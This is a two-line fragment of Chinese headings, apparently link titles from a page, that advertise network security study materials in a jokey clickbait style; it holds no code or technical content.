【 再也不用担心我的网络安全学习-很想给她来一巴掌 】
【 网安资料 】